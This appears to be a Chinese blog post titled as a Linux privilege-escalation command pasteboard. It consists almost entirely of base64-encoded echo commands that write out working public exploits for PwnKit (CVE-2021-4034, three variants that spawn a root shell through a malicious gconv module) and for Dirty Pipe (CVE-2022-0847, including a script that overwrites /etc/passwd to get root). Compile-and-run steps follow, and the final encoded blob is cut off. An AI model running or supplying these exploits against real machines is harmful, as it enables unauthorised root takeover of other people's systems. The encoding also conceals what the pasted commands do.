Linux提权命令粘贴板
|
0
|
NoteBook
|
341

95 字
|
3 分钟

Linux提权命令粘贴板

image-20220902192219730

Pkexec CVE-2021-4034

https://github.com/luijait/PwnKit-Exploit

echo Y2F0IHB3bmtpdDY0ZGVjb2RlZC5jIHwgYmFzZTY0 |base64 -d >b64payloadgen.sh

echo Q0ZMQUdTPS1XYWxsClRSVUU9JChzaGVsbCB3aGljaCB0cnVlKQoKLlBIT05ZOiBhbGwKYWxsOiBleHBsb2l0CgouUEhPTlk6IGNsZWFuCmNsZWFuOgoJcm0gLXJmIHRtcC8gZXhwbG9pdCBHQ09OVl9QQVRIPS4=|base64 -d >Makefile

echo I2luY2x1ZGUgPHVuaXN0ZC5oPgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgovKioKICogQGF1dGhvcjogbHVpamFpdAogKiBAdmVyc2lvbjogMS4wCiAqIEBDVkU6IENWRS0yMDIxLTQwMzQgCiovCgp2b2lkIGVudmlyb21lbnQoKQp7CnN5c3RlbSgibWtkaXIgJ0dDT05WX1BBVEg9LicgJiYgdG91Y2ggJ0dDT05WX1BBVEg9Li90bXAnICYmIGNobW9kICt4ICdHQ09OVl9QQVRIPS4vdG1wJyIpOwpzeXN0ZW0oIm1rZGlyIHRtcDtlY2hvIEkybHVZMngxWkdVZ1BITjBaR2x2TG1nK0NpTnBibU5zZFdSbElEeHpkR1JzYVdJdWFENEtJMmx1WTJ4MVpHVWdQSFZ1YVhOMFpDNW9QZ29LZG05cFpDQm5ZMjl1ZGloMmIybGtLU0I3ZlFvS0NuWnZhV1FnWjJOdmJuWmZhVzVwZENoMmIybGtJQ3B6ZEdWd0tRcDdDZ2t2TDFCbGNtMXpJQW9KYzJWMGRXbGtLREFwT3lCelpYUmxkV2xrS0RBcE95QnpaWFJuYVdRb01DazdJSE5sZEdWbmFXUW9NQ2s3Q1FvSkx5OUpiblp2Y1hWbElGTm9aV3hzQ2dsamFHRnlJQ29nYzJobGJHeGJYU0E5SUhzZ0lpOWlhVzR2WW1GemFDSXNJQ0l0YVNJc0lFNVZURXdnZlRzS0NTOHZSR1ZtYVc1bElGQmhkR2dLQ1dOb1lYSWdLaUJsYm5aZmRtRnljMXRkSUQwZ2V5QWlVRUZVU0QwdmRYTnlMMnh2WTJGc0wzTmlhVzQ2TDNWemNpOXNiMk5oYkM5aWFXNDZMM1Z6Y2k5elltbHVPaTkxYzNJdlltbHVPaTl6WW1sdU9pOWlhVzRpTENCT1ZVeE1JSDA3Q2dsbGVHVmpkbVVvYzJobGJHeGJNRjBzSUhOb1pXeHNMQ0JsYm5aZmRtRnljeWs3Q2dsbGVHbDBLREFwT3lBS2ZRbz0gfCBiYXNlNjQgLWQgPiB0bXAvYjY0bG9hZC5jOyBnY2MgdG1wL2I2NGxvYWQuYyAtbyB0bXAvcHdua2l0LnNvIC1zaGFyZWQgLWZQSUMgIik7CnN5c3RlbSgiZWNobyBiVzlrZFd4bElGVlVSaTA0THk4Z1VGZE9TMGxVTHk4Z2NIZHVhMmwwSURJSyB8IGJhc2U2NCAtZCA+IHRtcC9nY29udi1tb2R1bGVzIik7CQkKfQoKdm9pZCBiYW5uZXIoKQp7CnNldHZidWYoc3Rkb3V0LCBOVUxMLCBfSU9OQkYsIDApOwpwcmludGYoIkN1cnJlbnQgVXNlciBiZWZvcmUgZXhlY3V0ZSBleHBsb2l0XG5oYWNrZXJAdmljdGltJHdob2FtaTogIik7CnN5c3RlbSgid2hvYW1pIik7CnNsZWVwKDEpOwpwcmludGYoIkV4cGxvaXQgd3JpdHRlbiBieSBAbHVpamFpdCAoMHg2Yzc1Njk2YTYxNjk3NCkiKTsKfQoKaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQp7CgkKYmFubmVyKCk7CgkKZW52aXJvbWVudCgpOwoJCmNoYXIgKiBjb25zdCBpZGtbXSA9IHsKCU5VTEwKfTsKY2hhciAqIGNvbnN0IGVudG9ybm9bXSA9IHsidG1wIiwgCgkJCSAgIlBBVEg9R0NPTlZfUEFUSD0uIiwgCgkJCSAgIlNIRUxMPS9yYW5kb20iLCAKCQkJICAiQ0hBUlNFVD1QV05LSVQiLAoJCQkgICJHSU9fVVNFX1ZGUz0iLE5VTEwKCQkJIH07CglwcmludGYoIlxuWytdIEVuam95IHlvdXIgcm9vdCBpZiBleHBsb2l0IHdhcyBjb21wbGV0ZWQgc3VjY2VzZnVsbHlcbiIpOwoJcmV0dXJuIGV4ZWN2ZSgiL3Vzci9iaW4vcGtleGVjIiwgaWRrLCBlbnRvcm5vKTsKCQp9|base64 -d > exploit.c

echo I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgovKioKICogQGF1dGhvcjogbHVpamFpdAogKiBAdmVyc2lvbjogMS4wCiAqIEBDVkU6IENWRS0yMDIxLTQwMzQgCiovCgovL1Blcm1zCnZvaWQgcGVybXMoKXsKCXNldHVpZCgwKTsgCS8vc2V0cmVzdWlkKDAsIDAsIDApOyAKCXNldGV1aWQoMCk7CS8vc2V0cmVzZ2lkKDAsIDAsIDApOwoJc2V0Z2lkKDApOyAKCXNldGd1aWQoMCk7CgkKfQp2b2lkIGdjb252KHZvaWQpIHt9CgoKdm9pZCBnY29udl9pbml0KHZvaWQgKnN0ZXApCnsKCQoJcGVybXMoKTsKCQoJCgkvL0ludm9xdWUgU2hlbGwKCWNoYXIgKiBzaGVsbFtdID0geyAiL2Jpbi9iYXNoIiwgIi1pIiwgTlVMTCB9OwoJLy9EZWZpbmUgUGF0aAoJY2hhciAqIGVudl92YXJzW10gPSB7ICJQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL3NiaW46L3Vzci9iaW46L3NiaW46L2JpbiIsIE5VTEwgfTsKCWV4ZWN2ZShzaGVsbFswXSwgc2hlbGwsIGVudl92YXJzKTsKCWV4aXQoMCk7IAp9|base64 -d >pwnkit64decoded.c

make
id
./exploit

https://github.com/arthepsy/CVE-2021-4034

echo LyoKICogUHJvb2Ygb2YgQ29uY2VwdCBmb3IgUHduS2l0OiBMb2NhbCBQcml2aWxlZ2UgRXNjYWxhdGlvbiBWdWxuZXJhYmlsaXR5IERpc2NvdmVyZWQgaW4gcG9sa2l0GXMgcGtleGVjIChDVkUtMjAyMS00MDM0KSBieSBBbmRyaXMgUmF1Z3VsaXMgPG1vb0BhcnRoZXBzeS5ldT4KICogQWR2aXNvcnk6IGh0dHBzOi8vYmxvZy5xdWFseXMuY29tL3Z1bG5lcmFiaWxpdGllcy10aHJlYXQtcmVzZWFyY2gvMjAyMi8wMS8yNS9wd25raXQtbG9jYWwtcHJpdmlsZWdlLWVzY2FsYXRpb24tdnVsbmVyYWJpbGl0eS1kaXNjb3ZlcmVkLWluLXBvbGtpdHMtcGtleGVjLWN2ZS0yMDIxLTQwMzQKICovCiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KCmNoYXIgKnNoZWxsID0gCgkiI2luY2x1ZGUgPHN0ZGlvLmg+XG4iCgkiI2luY2x1ZGUgPHN0ZGxpYi5oPlxuIgoJIiNpbmNsdWRlIDx1bmlzdGQuaD5cblxuIgoJInZvaWQgZ2NvbnYoKSB7fVxuIgoJInZvaWQgZ2NvbnZfaW5pdCgpIHtcbiIKCSIJc2V0dWlkKDApOyBzZXRnaWQoMCk7XG4iCgkiCXNldGV1aWQoMCk7IHNldGVnaWQoMCk7XG4iCgkiCXN5c3RlbShcImV4cG9ydCBQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL3NiaW46L3Vzci9iaW46L3NiaW46L2Jpbjsgcm0gLXJmICdHQ09OVl9QQVRIPS4nICdwd25raXQnOyAvYmluL3NoXCIpO1xuIgoJIglleGl0KDApO1xuIgoJIn0iOwoKaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkgewoJRklMRSAqZnA7CglzeXN0ZW0oIm1rZGlyIC1wICdHQ09OVl9QQVRIPS4nOyB0b3VjaCAnR0NPTlZfUEFUSD0uL3B3bmtpdCc7IGNobW9kIGEreCAnR0NPTlZfUEFUSD0uL3B3bmtpdCciKTsKCXN5c3RlbSgibWtkaXIgLXAgcHdua2l0OyBlY2hvICdtb2R1bGUgVVRGLTgvLyBQV05LSVQvLyBwd25raXQgMicgPiBwd25raXQvZ2NvbnYtbW9kdWxlcyIpOwoJZnAgPSBmb3BlbigicHdua2l0L3B3bmtpdC5jIiwgInciKTsKCWZwcmludGYoZnAsICIlcyIsIHNoZWxsKTsKCWZjbG9zZShmcCk7CglzeXN0ZW0oImdjYyBwd25raXQvcHdua2l0LmMgLW8gcHdua2l0L3B3bmtpdC5zbyAtc2hhcmVkIC1mUElDIik7CgljaGFyICplbnZbXSA9IHsgInB3bmtpdCIsICJQQVRIPUdDT05WX1BBVEg9LiIsICJDSEFSU0VUPVBXTktJVCIsICJTSEVMTD1wd25raXQiLCBOVUxMIH07CglleGVjdmUoIi91c3IvYmluL3BrZXhlYyIsIChjaGFyKltdKXtOVUxMfSwgZW52KTsKfQ== |base64 -d > cve-2021-4034-poc.c

id
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
id

https://github.com/PeterGottesman/pwnkit-exploit

echo LlBIT05ZOiBkZWZhdWx0CmRlZmF1bHQ6IHJ1bi1leHBsb2l0CgpleHBsb2l0OiBleHBsb2l0LmMKCWdjYyAtbyAkQCAkPAoKZ2NvbnYvQkFEQ09OVi5zbzogZ2NvbnYvYmFkY29udi5jCgltYWtlIC1DIC4vZ2NvbnYgQkFEQ09OVi5zbwoKLlBIT05ZOiBydW4tZXhwbG9pdApydW4tZXhwbG9pdDogZXhwbG9pdCBnY29udi9CQURDT05WLnNvCgkuL2V4cGxvaXQKCi5QSE9OWTogY2xlYW4KY2xlYW46CglybSBleHBsb2l0CgltYWtlIC1DIC4vZ2NvbnYgY2xlYW4=|base64 -d >Makefile
echo I2luY2x1ZGUgPHVuaXN0ZC5oPgojaW5jbHVkZSA8c3RkaW8uaD4KCmludCBtYWluKCkKewogICAgLyogVGhlIGFyZ3YgYW5kIGVudmlyb25tZW50IHBhc3NlZCB0byBwa2V4ZWMsIHRoZSBiYXNpcyBvZiB0aGlzCiAgICAgKiBleHBsb2l0ICovCiAgICBjaGFyICphcmd2W10gPSB7TlVMTH07CgogICAgY2hhciAqZW52cFtdID0gewogICAgICAgICJnY29udiIsICAgICAgICAgICAgICAgIC8qIHBhdGggY29udGFpbmluZyBtYWxpY2lvdXMgZ2NvbnYgY29uZmlnL3NoYXJlZCBvYmogKi8KICAgICAgICAiUEFUSD1HQ09OVl9QQVRIPS4iLCAgICAvKiBFbnZpcm9ubWVudCB2YXJpYWJsZSB0byBiZSBpbmplY3RlZCAqLwogICAgICAgICJDSEFSU0VUPVpUIiwgICAgICAgICAgIC8qIENoYXJzZXQgZGVmaW5lZCBpbiBtYWxpY2lvdXMgZ2NvbnYgY29uZmlnICovCiAgICAgICAgIlNIRUxMPWZha2VzaGVsbCIsICAgICAgLyogSW52YWxpZCBzaGVsbCB2YWx1ZSwgdHJpZ2dlcnMgZXJyb3IgdG8gYmUgcHJpbnRlZCwgcmVzdWx0aW5nIGluIGNoYXJzZXQgY29udmVyc2lvbiAqLwogICAgICAgICJHSU9fVVNFX1ZGUz0iLCAgICAgICAgICAgICAvKiBHSU9fVVNFX1ZGUyBtdXN0IGJlIHVuc2V0IG9uIHZlcnNpb25zIG9mIHBrZXhlYyB0aGF0IHNldCBpdC4gKi8KICAgICAgICBOVUxMfTsKCiAgICBmcHJpbnRmKHN0ZGVyciwgIlJ1bm5pbmcgZXhwbG9pdC4uLlxuIik7CgogICAgLyogUnVuIHBrZXhlYyEgKi8KICAgIGludCByZXQgPSBleGVjdmUoIi91c3IvYmluL3BrZXhlYyIsIGFyZ3YsIGVudnApOwogICAgaWYgKHJldCkKICAgICAgICBwZXJyb3IoInBrZXhlYyIpOwoKICAgIHJldHVybiAtMTsKfQ==|base64 -d >exploit.c

mkdir gconv
echo LlBIT05ZOiBkZWZhdWx0CmRlZmF1bHQ6IHRlc3QKCkJBRENPTlYuc286IGJhZGNvbnYuYwoJZ2NjIC1mUElDIC1zaGFyZWQgJDwgLW8gJEAKCi5QSE9OWTogdGVzdAp0ZXN0OiBCQURDT05WLnNvCglHQ09OVl9QQVRIPS4gaWNvbnYgLWYgVVRGLTggLXQgWlQgPChlY2hvIGhpKQoKLlBIT05ZOiBjbGVhbgpjbGVhbjoKCXJtIEJBRENPTlYuc28=|base64 -d >gconv/Makefile
echo I2luY2x1ZGUgPGdjb252Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPHN0ZGlvLmg+CgovKiBUaGlzIGZ1bmN0aW9uIGlzIGV4ZWN1dGVkIGFzIHJvb3QgKi8Kdm9pZCBwYXlsb2FkKCkKewogICAgY2hhciAqYXJndltdID0geyIvYmluL3NoIiwgTlVMTH07CiAgICB1aWRfdCB1aWQ7CgogICAgdWlkID0gZ2V0dWlkKCk7CiAgICBmcHJpbnRmKHN0ZGVyciwgIkFmdGVyIGV4cGxvaXQsIHlvdXIgVUlEIGlzICVkXG4iLCB1aWQpOwogICAgZnByaW50ZihzdGRlcnIsICJSdW5uaW5nIHNoZWxsOlxuXG4iKTsKICAgIGV4ZWN2KGFyZ3ZbMF0sIGFyZ3YpOwp9CgovKiBDYWxsZWQgdXBvbiBzaGFyZWQgb2JqZWN0IGxvYWRpbmcgYnkgZ2xpYmMuICovCmludCBnY29udl9pbml0IChzdHJ1Y3QgX19nY29udl9zdGVwICpzdGVwKQp7CiAgICAvKiBSdW4gdGhpcyBwcm9jZXNzIGFuZCBzdWJwcm9jZXNzZXMgYXMgcm9vdCAqLwogICAgc2V0dWlkKDApOwogICAgc2V0Z2lkKDApOwogICAgc2V0ZXVpZCgwKTsKICAgIHNldGVnaWQoMCk7CgogICAgLyogRXhlY3V0ZSBwYXlsb2FkICovCiAgICBwYXlsb2FkKCk7CgogICAgcmV0dXJuIF9fR0NPTlZfT0s7Cn0KCi8qCiAqIGdsaWJjIGNoZWNrcyBmb3IgdGhpcyBmdW5jdGlvbiB3aGVuIGxvYWRpbmcgdGhlIHNoYXJlZCBvYmplY3QuIEl0CiAqIGlzIG5ldmVyIGNhbGxlZCwgYnV0IGlmIGl0IGRvZXMgbm90IGV4aXN0LCBhbiBhc3NlcnRpb24gZmFpbHMuCiAqLwppbnQgZ2NvbnYoc3RydWN0IF9fZ2NvbnZfc3RlcCAqc3RlcCkKewogICAgcmV0dXJuIF9fR0NPTlZfT0s7Cn0=|base64 -d >gconv/badconv.c

echo bW9kdWxlIFVOSUNPREUvLyBaVC8vIEJBRENPTlYgMQ==|base64 -d >gconv/gconv-modules
mkdir GCONV_PATH=.
touch GCONV_PATH=./gconv

make

Dirty-Pipe脏管CVE-2022-0847

https://github.com/r1is/CVE-2022-0847/

echo Iy9iaW4vYmFzaApjYXQ+ZXhwLmM8PEVPRgovKiBTUERYLUxpY2Vuc2UtSWRlbnRpZmllcjogR1BMLTIuMCAqLwovKgogKiBDb3B5cmlnaHQgMjAyMiBDTTRhbGwgR21iSCAvIElPTk9TIFNFCiAqCiAqIGF1dGhvcjogTWF4IEtlbGxlcm1hbm4gPG1heC5rZWxsZXJtYW5uQGlvbm9zLmNvbT4KICoKICogUHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGZvciB0aGUgRGlydHkgUGlwZQogKiB2dWxuZXJhYmlsaXR5IChDVkUtMjAyMi0wODQ3KSBjYXVzZWQgYnkgYW4gdW5pbml0aWFsaXplZAogKiAicGlwZV9idWZmZXIuZmxhZ3MiIHZhcmlhYmxlLiAgSXQgZGVtb25zdHJhdGVzIGhvdyB0byBvdmVyd3JpdGUgYW55CiAqIGZpbGUgY29udGVudHMgaW4gdGhlIHBhZ2UgY2FjaGUsIGV2ZW4gaWYgdGhlIGZpbGUgaXMgbm90IHBlcm1pdHRlZAogKiB0byBiZSB3cml0dGVuLCBpbW11dGFibGUgb3Igb24gYSByZWFkLW9ubHkgbW91bnQuCiAqCiAqIFRoaXMgZXhwbG9pdCByZXF1aXJlcyBMaW51eCA1Ljggb3IgbGF0ZXI7IHRoZSBjb2RlIHBhdGggd2FzIG1hZGUKICogcmVhY2hhYmxlIGJ5IGNvbW1pdCBmNmRkOTc1NTgzYmQgKCJwaXBlOiBtZXJnZQogKiBhbm9uX3BpcGVfYnVmKl9vcHMiKS4gIFRoZSBjb21taXQgZGlkIG5vdCBpbnRyb2R1Y2UgdGhlIGJ1ZywgaXQgd2FzCiAqIHRoZXJlIGJlZm9yZSwgaXQganVzdCBwcm92aWRlZCBhbiBlYXN5IHdheSB0byBleHBsb2l0IGl0LgogKgogKiBUaGVyZSBhcmUgdHdvIG1ham9yIGxpbWl0YXRpb25zIG9mIHRoaXMgZXhwbG9pdDogdGhlIG9mZnNldCBjYW5ub3QKICogYmUgb24gYSBwYWdlIGJvdW5kYXJ5IChpdCBuZWVkcyB0byB3cml0ZSBvbmUgYnl0ZSBiZWZvcmUgdGhlIG9mZnNldAogKiB0byBhZGQgYSByZWZlcmVuY2UgdG8gdGhpcyBwYWdlIHRvIHRoZSBwaXBlKSwgYW5kIHRoZSB3cml0ZSBjYW5ub3QKICogY3Jvc3MgYSBwYWdlIGJvdW5kYXJ5LgogKgogKiBFeGFtcGxlOiAuL3dyaXRlX2FueXRoaW5nIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzIDEgJCdcbnNzaC1lZDI1NTE5IEFBQS4uLi4uLlxuJwogKgogKiBGdXJ0aGVyIGV4cGxhbmF0aW9uOiBodHRwczovL2RpcnR5cGlwZS5jbTRhbGwuY29tLwogKi8KI2RlZmluZSBfR05VX1NPVVJDRQojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRlIDxmY250bC5oPgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDxzeXMvc3RhdC5oPgojaW5jbHVkZSA8c3lzL3VzZXIuaD4KI2lmbmRlZiBQQUdFX1NJWkUKI2RlZmluZSBQQUdFX1NJWkUgNDA5NgojZW5kaWYKLyoqCiAqIENyZWF0ZSBhIHBpcGUgd2hlcmUgYWxsICJidWZzIiBvbiB0aGUgcGlwZV9pbm9kZV9pbmZvIHJpbmcgaGF2ZSB0aGUKICogUElQRV9CVUZfRkxBR19DQU5fTUVSR0UgZmxhZyBzZXQuCiAqLwpzdGF0aWMgdm9pZCBwcmVwYXJlX3BpcGUoaW50IHBbMl0pCnsKCWlmIChwaXBlKHApKSBhYm9ydCgpOwoJY29uc3QgdW5zaWduZWQgcGlwZV9zaXplID0gZmNudGwocFsxXSwgRl9HRVRQSVBFX1NaKTsKCXN0YXRpYyBjaGFyIGJ1ZmZlcls0MDk2XTsKCS8qIGZpbGwgdGhlIHBpcGUgY29tcGxldGVseTsgZWFjaCBwaXBlX2J1ZmZlciB3aWxsIG5vdyBoYXZlCgkgICB0aGUgUElQRV9CVUZfRkxBR19DQU5fTUVSR0UgZmxhZyAqLwoJZm9yICh1bnNpZ25lZCByID0gcGlwZV9zaXplOyByID4gMDspIHsKCQl1bnNpZ25lZCBuID0gciA+IHNpemVvZihidWZmZXIpID8gc2l6ZW9mKGJ1ZmZlcikgOiByOwoJCXdyaXRlKHBbMV0sIGJ1ZmZlciwgbik7CgkJciAtPSBuOwoJfQoJLyogZHJhaW4gdGhlIHBpcGUsIGZyZWVpbmcgYWxsIHBpcGVfYnVmZmVyIGluc3RhbmNlcyAoYnV0CgkgICBsZWF2aW5nIHRoZSBmbGFncyBpbml0aWFsaXplZCkgKi8KCWZvciAodW5zaWduZWQgciA9IHBpcGVfc2l6ZTsgciA+IDA7KSB7CgkJdW5zaWduZWQgbiA9IHIgPiBzaXplb2YoYnVmZmVyKSA/IHNpemVvZihidWZmZXIpIDogcjsKCQlyZWFkKHBbMF0sIGJ1ZmZlciwgbik7CgkJciAtPSBuOwoJfQoJLyogdGhlIHBpcGUgaXMgbm93IGVtcHR5LCBhbmQgaWYgc29tZWJvZHkgYWRkcyBhIG5ldwoJICAgcGlwZV9idWZmZXIgd2l0aG91dCBpbml0aWFsaXppbmcgaXRzICJmbGFncyIsIHRoZSBidWZmZXIKCSAgIHdpbGwgYmUgbWVyZ2VhYmxlICovCn0= |base64 -d >Dirty-Pipe.sh
echo CmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikKewoJaWYgKGFyZ2MgIT0gNCkgewoJCWZwcmludGYoc3RkZXJyLCAiVXNhZ2U6ICVzIFRBUkdFVEZJTEUgT0ZGU0VUIERBVEFcbiIsIGFyZ3ZbMF0pOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9CgkvKiBkdW1iIGNvbW1hbmQtbGluZSBhcmd1bWVudCBwYXJzZXIgKi8KCWNvbnN0IGNoYXIgKmNvbnN0IHBhdGggPSBhcmd2WzFdOwoJbG9mZl90IG9mZnNldCA9IHN0cnRvdWwoYXJndlsyXSwgTlVMTCwgMCk7Cgljb25zdCBjaGFyICpjb25zdCBkYXRhID0gYXJndlszXTsKCWNvbnN0IHNpemVfdCBkYXRhX3NpemUgPSBzdHJsZW4oZGF0YSk7CglpZiAob2Zmc2V0ICUgUEFHRV9TSVpFID09IDApIHsKCQlmcHJpbnRmKHN0ZGVyciwgIlNvcnJ5LCBjYW5ub3Qgc3RhcnQgd3JpdGluZyBhdCBhIHBhZ2UgYm91bmRhcnlcbiIpOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9Cgljb25zdCBsb2ZmX3QgbmV4dF9wYWdlID0gKG9mZnNldCB8IChQQUdFX1NJWkUgLSAxKSkgKyAxOwoJY29uc3QgbG9mZl90IGVuZF9vZmZzZXQgPSBvZmZzZXQgKyAobG9mZl90KWRhdGFfc2l6ZTsKCWlmIChlbmRfb2Zmc2V0ID4gbmV4dF9wYWdlKSB7CgkJZnByaW50ZihzdGRlcnIsICJTb3JyeSwgY2Fubm90IHdyaXRlIGFjcm9zcyBhIHBhZ2UgYm91bmRhcnlcbiIpOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9CgkvKiBvcGVuIHRoZSBpbnB1dCBmaWxlIGFuZCB2YWxpZGF0ZSB0aGUgc3BlY2lmaWVkIG9mZnNldCAqLwoJY29uc3QgaW50IGZkID0gb3BlbihwYXRoLCBPX1JET05MWSk7IC8vIHllcywgcmVhZC1vbmx5ISA6LSkKCWlmIChmZCA8IDApIHsKCQlwZXJyb3IoIm9wZW4gZmFpbGVkIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCXN0cnVjdCBzdGF0IHN0OwoJaWYgKGZzdGF0KGZkLCAmc3QpKSB7CgkJcGVycm9yKCJzdGF0IGZhaWxlZCIpOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9CglpZiAob2Zmc2V0ID4gc3Quc3Rfc2l6ZSkgewoJCWZwcmludGYoc3RkZXJyLCAiT2Zmc2V0IGlzIG5vdCBpbnNpZGUgdGhlIGZpbGVcbiIpOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9CglpZiAoZW5kX29mZnNldCA+IHN0LnN0X3NpemUpIHsKCQlmcHJpbnRmKHN0ZGVyciwgIlNvcnJ5LCBjYW5ub3QgZW5sYXJnZSB0aGUgZmlsZVxuIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCS8qIGNyZWF0ZSB0aGUgcGlwZSB3aXRoIGFsbCBmbGFncyBpbml0aWFsaXplZCB3aXRoCgkgICBQSVBFX0JVRl9GTEFHX0NBTl9NRVJHRSAqLwoJaW50IHBbMl07CglwcmVwYXJlX3BpcGUocCk7CgkvKiBzcGxpY2Ugb25lIGJ5dGUgZnJvbSBiZWZvcmUgdGhlIHNwZWNpZmllZCBvZmZzZXQgaW50byB0aGUKCSAgIHBpcGU7IHRoaXMgd2lsbCBhZGQgYSByZWZlcmVuY2UgdG8gdGhlIHBhZ2UgY2FjaGUsIGJ1dAoJICAgc2luY2UgY29weV9wYWdlX3RvX2l0ZXJfcGlwZSgpIGRvZXMgbm90IGluaXRpYWxpemUgdGhlCgkgICAiZmxhZ3MiLCBQSVBFX0JVRl9GTEFHX0NBTl9NRVJHRSBpcyBzdGlsbCBzZXQgKi8KCS0tb2Zmc2V0OwoJc3NpemVfdCBuYnl0ZXMgPSBzcGxpY2UoZmQsICZvZmZzZXQsIHBbMV0sIE5VTEwsIDEsIDApOwoJaWYgKG5ieXRlcyA8IDApIHsKCQlwZXJyb3IoInNwbGljZSBmYWlsZWQiKTsKCQlyZXR1cm4gRVhJVF9GQUlMVVJFOwoJfQoJaWYgKG5ieXRlcyA9PSAwKSB7CgkJZnByaW50ZihzdGRlcnIsICJzaG9ydCBzcGxpY2VcbiIpOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9CgkvKiB0aGUgZm9sbG93aW5nIHdyaXRlIHdpbGwgbm90IGNyZWF0ZSBhIG5ldyBwaXBlX2J1ZmZlciwgYnV0CgkgICB3aWxsIGluc3RlYWQgd3JpdGUgaW50byB0aGUgcGFnZSBjYWNoZSwgYmVjYXVzZSBvZiB0aGUKCSAgIFBJUEVfQlVGX0ZMQUdfQ0FOX01FUkdFIGZsYWcgKi8KCW5ieXRlcyA9IHdyaXRlKHBbMV0sIGRhdGEsIGRhdGFfc2l6ZSk7CglpZiAobmJ5dGVzIDwgMCkgewoJCXBlcnJvcigid3JpdGUgZmFpbGVkIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCWlmICgoc2l6ZV90KW5ieXRlcyA8IGRhdGFfc2l6ZSkgewoJCWZwcmludGYoc3RkZXJyLCAic2hvcnQgd3JpdGVcbiIpOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9CglwcmludGYoIkl0IHdvcmtlZCFcbiIpOwoJcmV0dXJuIEVYSVRfU1VDQ0VTUzsKfQpFT0YKCmdjYyBleHAuYyAtbyBleHAgLXN0ZD1jOTkKCiMgB/3GAYf2CnJtIC1mIC90bXAvcGFzc3dkCmNwIC9ldGMvcGFzc3dkIC90bXAvcGFzc3dkCmlmIFsgLWYgIi90bXAvcGFzc3dkIiBdO3RoZW4KCWVjaG8gIi9ldGMvcGFzc3dk8gf9MC90bXAvcGFzc3dkIgoJcGFzc3dkX3RtcD0kKGNhdCAvZXRjL3Bhc3N3ZHxoZWFkKQoJLi9leHAgL2V0Yy9wYXNzd2QgMSAiJHtwYXNzd2RfdG1wL3Jvb3Q6eC9vb3Q6fSIKCgllY2hvIC1lICJcbiMgYg2fZYTGAVxucm0gLXJmIC9ldGMvcGFzc3dkXG5tdiAvdG1wL3Bhc3N3ZCAvZXRjL3Bhc3N3ZCIKCgkjILAo7+XgAMYBB2Iwcm9vdCb3CglzdSByb290CmVsc2UKCWVjaG8gIi9ldGMvcGFzc3dkKgf9MC90bXAvcGFzc3dkIgoJZXhpdCAxCmZp|base64 -d >>Dirty-Pipe.sh
bash ./Dirty-Pipe.sh

https://github.com/Al1ex/CVE-2022-0847

echo LyogU1BEWC1MaWNlbnNlLUlkZW50aWZpZXI6IEdQTC0yLjAgKi8KLyoKICogQ29weXJpZ2h0IDIwMjIgQ000YWxsIEdtYkggLyBJT05PUyBTRQogKgogKiBhdXRob3I6IE1heCBLZWxsZXJtYW5uIDxtYXgua2VsbGVybWFubkBpb25vcy5jb20+CiAqCiAqIFByb29mLW9mLWNvbmNlcHQgZXhwbG9pdCBmb3IgdGhlIERpcnR5IFBpcGUKICogdnVsbmVyYWJpbGl0eSAoQ1ZFLTIwMjItMDg0NykgY2F1c2VkIGJ5IGFuIHVuaW5pdGlhbGl6ZWQKICogInBpcGVfYnVmZmVyLmZsYWdzIiB2YXJpYWJsZS4gIEl0IGRlbW9uc3RyYXRlcyBob3cgdG8gb3ZlcndyaXRlIGFueQogKiBmaWxlIGNvbnRlbnRzIGluIHRoZSBwYWdlIGNhY2hlLCBldmVuIGlmIHRoZSBmaWxlIGlzIG5vdCBwZXJtaXR0ZWQKICogdG8gYmUgd3JpdHRlbiwgaW1tdXRhYmxlIG9yIG9uIGEgcmVhZC1vbmx5IG1vdW50LgogKgogKiBUaGlzIGV4cGxvaXQgcmVxdWlyZXMgTGludXggNS44IG9yIGxhdGVyOyB0aGUgY29kZSBwYXRoIHdhcyBtYWRlCiAqIHJlYWNoYWJsZSBieSBjb21taXQgZjZkZDk3NTU4M2JkICgicGlwZTogbWVyZ2UKICogYW5vbl9waXBlX2J1Zipfb3BzIikuICBUaGUgY29tbWl0IGRpZCBub3QgaW50cm9kdWNlIHRoZSBidWcsIGl0IHdhcwogKiB0aGVyZSBiZWZvcmUsIGl0IGp1c3QgcHJvdmlkZWQgYW4gZWFzeSB3YXkgdG8gZXhwbG9pdCBpdC4KICoKICogVGhlcmUgYXJlIHR3byBtYWpvciBsaW1pdGF0aW9ucyBvZiB0aGlzIGV4cGxvaXQ6IHRoZSBvZmZzZXQgY2Fubm90CiAqIGJlIG9uIGEgcGFnZSBib3VuZGFyeSAoaXQgbmVlZHMgdG8gd3JpdGUgb25lIGJ5dGUgYmVmb3JlIHRoZSBvZmZzZXQKICogdG8gYWRkIGEgcmVmZXJlbmNlIHRvIHRoaXMgcGFnZSB0byB0aGUgcGlwZSksIGFuZCB0aGUgd3JpdGU